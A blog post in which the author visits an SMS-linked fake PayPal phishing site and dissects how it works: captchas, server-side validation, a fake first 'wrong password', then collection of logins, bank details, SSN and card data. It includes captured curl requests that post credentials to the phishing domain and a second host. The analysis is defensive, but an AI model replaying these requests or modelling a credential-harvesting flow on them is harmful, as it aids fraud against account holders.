We all get these phishing emails that look real about an account or transaction and asks you to login to your account for some reason.

A friend posted a warning about a phishing attempt he received as an SMS with a link to a fake PayPal site. The message claims that his account was suspended and he needs to login to verify and restore the account.

I've always ignored these phishing messages and fake sites. The most I would do is report it if it is in an email. This time I decided to follow the link and see what they have done. What information they are after, and how real the fake site would look.

I first spun up my VPN (I use NordVPN) and connected to a Brazilian server

Then I open the website in an incognito mode (you can never be too careful with these sites) I should have opened it from a Virtual Machine.

A good thing was that got the Google Chrome warning about the deceptive site!

I continued :)  and that's where I noticed that these hackers/scammers are not your average dumb hackers. They have actually gone above and beyond to

  • make this look real
  • collect as much info as possible
  • protect agains scam baiters

To start with, they actually have Captchas when you first enter the site. LOL

Then they take you a somewhat realistic-looking PayPal login page. And that's where I open up my good-ole developer tools.

I made up an email address and used it in the forms. They have validation on email addresses, and not only client side running in you browser, they actually have remote (server-side) email validation!! (I hope they are not using my code to do that) Not to mention that all the POST requests are also validated with session and cookies

curl 'https://mypaypalcheck.com/authflow/emailauth/emailvalidate.php?emaildress=jon297_1992@gmail.com&_=1587xxxxx' -H 'Connection: keep-alive' -H 'Pragma: no-cache' -H 'Cache-Control: no-cache' -H 'Accept: application/json, text/javascript, */*; q=0.01' -H 'Sec-Fetch-Dest: empty' -H 'X-Requested-With: XMLHttpRequest' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36' -H 'DNT: 1' -H 'Sec-Fetch-Site: same-origin' -H 'Sec-Fetch-Mode: cors' -H 'Referer: https://mypaypalcheck.com/authflow/challengesBank?key=sslchannel=true&sessionid=&country.x=BR&clientInstanceId=89xxxxxxxxxxx' -H 'Accept-Language: en-US,en;q=0.9' -H 'Cookie: PHPSESSID=52760xxxxxxxxxxxxxx' --compressed

So, I entered my password (very strong password!)

And noticed that at first attempt they do not collect the password, there are no requests being sent. Rather, they show you a message that the password is in correct. This is somewhat clever to make sure that you enter you actual password

And now data collection begins!!

Username/Password

They make a post request to get the username and password. Again, with session and cookies validations:

curl 'https://mypaypalcheck.com/authflow/data/paypal/loginpaypal?key=sslchannel=true&sessionid=&country.x=BR&clientInstanceId=89xxxxxxxxxxxxxxx' -H 'Connection: keep-alive' -H 'Pragma: no-cache' -H 'Cache-Control: no-cache' -H 'Origin: https://mypaypalcheck.com' -H 'Upgrade-Insecure-Requests: 1' -H 'DNT: 1' -H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36' -H 'Sec-Fetch-Dest: document' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' -H 'Sec-Fetch-Site: same-origin' -H 'Sec-Fetch-Mode: navigate' -H 'Sec-Fetch-User: ?1' -H 'Referer: https://mypaypalcheck.com/authflow/signin?key=sslchannel=true&sessionid=&country.x=BR&clientInstanceId=89xxxxxxxxxx' -H 'Accept-Language: en-US,en;q=0.9' -H 'Cookie: PHPSESSID=52xxxxxxxxxxx' --data 'EML=jon297_1992%40gmail.com&PWD=password1_1pass' --compressed

Bank Account

Then they follow with the bank account info. Here, things get a little more interesting and it seems like they maybe re-using different components of their system for different scams.

This part here seems to be loaded from a different server, and looks like a module that could also be used to fake attempting to connect payment info (if you pay for a service online)

The content is loaded form https://16shop-authen.cleverapps.io/paypal/ which is when looking at that main domain, it seems like a legit business that offers Platform as a Service (PaaS). But who knows, it could be malicious too!

They even do CORs checks and all. SMH!

curl 'https://16shop-authen.cleverapps.io/paypal/' -H 'Connection: keep-alive' -H 'Pragma: no-cache' -H 'Cache-Control: no-cache' -H 'Accept: */*' -H 'Sec-Fetch-Dest: empty' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36' -H 'DNT: 1' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'Origin: https://mypaypalcheck.com' -H 'Sec-Fetch-Site: cross-site' -H 'Sec-Fetch-Mode: cors' -H 'Referer: https://mypaypalcheck.com/authflow/challengesBank?key=sslchannel=true&sessionid=&country.x=BR&clientInstanceId=89xxxxxxxxxx' -H 'Accept-Language: en-US,en;q=0.9' --data 'userbank=jon297_1992&passwordbank=password1_1pass&loginretry=1&PaypalBank=Chase' --compressed

Personal Info

Then they move on to collection all personal info, name, address, SSN, phone, phone PIN, etc.

What's funny here, is that not only they are doing basic client side validation, they are also very helpful and want to save you time. They call an API to auto populate the City form the ZIP code you enter.

I head over to www.fakepersongenerator.com to get some fake info :)

And fill them in

Debit Card

And here they validate too, and load some pretty logos for you so you don't get confused which type of debit card you have...

The End

Finally after they collect all this info, they redirect you to the real PayPal site :(